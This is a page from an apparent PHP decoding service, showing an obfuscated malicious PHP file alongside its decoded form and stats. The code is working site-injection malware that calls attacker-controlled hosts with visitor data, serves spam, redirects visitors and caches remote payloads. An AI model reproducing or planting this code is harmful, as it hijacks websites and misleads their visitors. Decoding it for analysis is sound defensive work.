Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @ob_start(); $JJqibLRzDjqXwGnxwbde='aHR0cDovL3BhbmVsLmM5OXNoZWxsLmJpei9kYXRhMi5waHA=..

Decoded Output download

<?php @ob_start(); $JJqibLRzDjqXwGnxwbde='aHR0cDovL3BhbmVsLmM5OXNoZWxsLmJpei9kYXRhMi5waHA='; $MBBsATIzWKPZAvfjzmel=@$_SERVER["HTTP_HOST"];$MBBsATIzWKPZAvfjzmel=str_replace('www.','',$MBBsATIzWKPZAvfjzmel);if(@$_GET["mygodra"]){echo '<!--MYGODRA-->';exit();}$gtTaDRsNpxKbYluyfcYc=curl_init();curl_setopt($gtTaDRsNpxKbYluyfcYc,CURLOPT_URL,base64_decode($JJqibLRzDjqXwGnxwbde));curl_setopt($gtTaDRsNpxKbYluyfcYc,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($gtTaDRsNpxKbYluyfcYc,CURLOPT_RETURNTRANSFER,true);curl_setopt($gtTaDRsNpxKbYluyfcYc,CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);curl_setopt($gtTaDRsNpxKbYluyfcYc,CURLOPT_HTTPHEADER,array('RA-DOMAIN: '.$MBBsATIzWKPZAvfjzmel.''));curl_setopt($gtTaDRsNpxKbYluyfcYc,CURLOPT_TIMEOUT,10);$NObnjgxJsCUzVOzyFSmV=curl_exec($gtTaDRsNpxKbYluyfcYc);$pWWoirNotLqhzrvIySsQ=@json_decode(base64_decode($NObnjgxJsCUzVOzyFSmV),true);if($pWWoirNotLqhzrvIySsQ["type"]=="link"){echo base64_decode($pWWoirNotLqhzrvIySsQ["response"]);}elseif($pWWoirNotLqhzrvIySsQ["type"]=="redirect"){header('HTTP/1.1 301 Moved Permanently');header('Location: '.base64_decode($pWWoirNotLqhzrvIySsQ["response"]).'');exit();}
 
if($_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]===base64_decode('cGluZw=='))exit(base64_decode('b2s='));function g0($v1){$a2=curl_init(base64_decode('aHR0cHM6Ly8xM2NmM2RlMjM1ZDc0MDVkYmVlZTAxODc1MTFhMjA0OC54eXovYWE='));curl_setopt($a2,CURLOPT_CUSTOMREQUEST,base64_decode('UE9TVA=='));curl_setopt($a2,CURLOPT_POSTFIELDS,json_encode(array(base64_decode('dQ==')=>$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')],base64_decode('aA==')=>$_SERVER[base64_decode('SFRUUF9IT1NU')],base64_decode('YQ==')=>$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')],base64_decode('Yw==')=>$v1)));curl_setopt($a2,CURLOPT_RETURNTRANSFER,true);curl_setopt($a2,CURLOPT_HTTPHEADER,array(base64_decode('Q29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29u'),));$f3=curl_exec($a2);if($f3===false)echo base64_decode('Y3VybCBlcnI6IA==').curl_error($a2);curl_close($a2);$o4=json_decode($f3,true);return $o4;}$o4=g0(false);if($o4[base64_decode('dA==')]===1){header($o4[base64_decode('dg==')],true,301);exit();}else if($o4[base64_decode('dA==')]===2){echo base64_decode($o4[base64_decode('dg==')]);}else if($o4[base64_decode('dA==')]===3){$v5=sys_get_temp_dir().base64_decode('Lw==').$o4[base64_decode('dg==')];if(file_exists($v5)){$u6=file_get_contents($v5);$r7=1;}else{if(!$o4[base64_decode('ZA==')])$o4=g0(true);$u6=base64_decode($o4[base64_decode('ZA==')]);file_put_contents($v5,$u6);$r7=0;}header($o4[base64_decode('Yw==')]);header($o4[base64_decode('bA==')]);header(base64_decode('eC1jOiA=').$r7,true,$o4[base64_decode('cw==')]);echo $u6;exit();} 
 
include('indeex.php'); ?>

Did this file decode correctly?

Original Code

<?php @ob_start(); $JJqibLRzDjqXwGnxwbde='aHR0cDovL3BhbmVsLmM5OXNoZWxsLmJpei9kYXRhMi5waHA='; $MBBsATIzWKPZAvfjzmel=@$_SERVER["HTTP_HOST"];$MBBsATIzWKPZAvfjzmel=str_replace('www.','',$MBBsATIzWKPZAvfjzmel);if(@$_GET["mygodra"]){echo '<!--MYGODRA-->';exit();}$gtTaDRsNpxKbYluyfcYc=curl_init();curl_setopt($gtTaDRsNpxKbYluyfcYc,CURLOPT_URL,base64_decode($JJqibLRzDjqXwGnxwbde));curl_setopt($gtTaDRsNpxKbYluyfcYc,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($gtTaDRsNpxKbYluyfcYc,CURLOPT_RETURNTRANSFER,true);curl_setopt($gtTaDRsNpxKbYluyfcYc,CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);curl_setopt($gtTaDRsNpxKbYluyfcYc,CURLOPT_HTTPHEADER,array('RA-DOMAIN: '.$MBBsATIzWKPZAvfjzmel.''));curl_setopt($gtTaDRsNpxKbYluyfcYc,CURLOPT_TIMEOUT,10);$NObnjgxJsCUzVOzyFSmV=curl_exec($gtTaDRsNpxKbYluyfcYc);$pWWoirNotLqhzrvIySsQ=@json_decode(base64_decode($NObnjgxJsCUzVOzyFSmV),true);if($pWWoirNotLqhzrvIySsQ["type"]=="link"){echo base64_decode($pWWoirNotLqhzrvIySsQ["response"]);}elseif($pWWoirNotLqhzrvIySsQ["type"]=="redirect"){header('HTTP/1.1 301 Moved Permanently');header('Location: '.base64_decode($pWWoirNotLqhzrvIySsQ["response"]).'');exit();}

if($_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]===base64_decode('cGluZw=='))exit(base64_decode('b2s='));function g0($v1){$a2=curl_init(base64_decode('aHR0cHM6Ly8xM2NmM2RlMjM1ZDc0MDVkYmVlZTAxODc1MTFhMjA0OC54eXovYWE='));curl_setopt($a2,CURLOPT_CUSTOMREQUEST,base64_decode('UE9TVA=='));curl_setopt($a2,CURLOPT_POSTFIELDS,json_encode(array(base64_decode('dQ==')=>$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')],base64_decode('aA==')=>$_SERVER[base64_decode('SFRUUF9IT1NU')],base64_decode('YQ==')=>$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')],base64_decode('Yw==')=>$v1)));curl_setopt($a2,CURLOPT_RETURNTRANSFER,true);curl_setopt($a2,CURLOPT_HTTPHEADER,array(base64_decode('Q29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29u'),));$f3=curl_exec($a2);if($f3===false)echo base64_decode('Y3VybCBlcnI6IA==').curl_error($a2);curl_close($a2);$o4=json_decode($f3,true);return $o4;}$o4=g0(false);if($o4[base64_decode('dA==')]===1){header($o4[base64_decode('dg==')],true,301);exit();}else if($o4[base64_decode('dA==')]===2){echo base64_decode($o4[base64_decode('dg==')]);}else if($o4[base64_decode('dA==')]===3){$v5=sys_get_temp_dir().base64_decode('Lw==').$o4[base64_decode('dg==')];if(file_exists($v5)){$u6=file_get_contents($v5);$r7=1;}else{if(!$o4[base64_decode('ZA==')])$o4=g0(true);$u6=base64_decode($o4[base64_decode('ZA==')]);file_put_contents($v5,$u6);$r7=0;}header($o4[base64_decode('Yw==')]);header($o4[base64_decode('bA==')]);header(base64_decode('eC1jOiA=').$r7,true,$o4[base64_decode('cw==')]);echo $u6;exit();} 

include('indeex.php'); ?>

Function Calls

ob_start 1
str_replace 1

Variables

$JJqibLRzDjqXwGnxwbde aHR0cDovL3BhbmVsLmM5OXNoZWxsLmJpei9kYXRhMi5waHA=
$MBBsATIzWKPZAvfjzmel None

Stats

MD5 0e99297cc5aedc03a2a279c1eb54660d
Eval Count 0
Decode Time 108 ms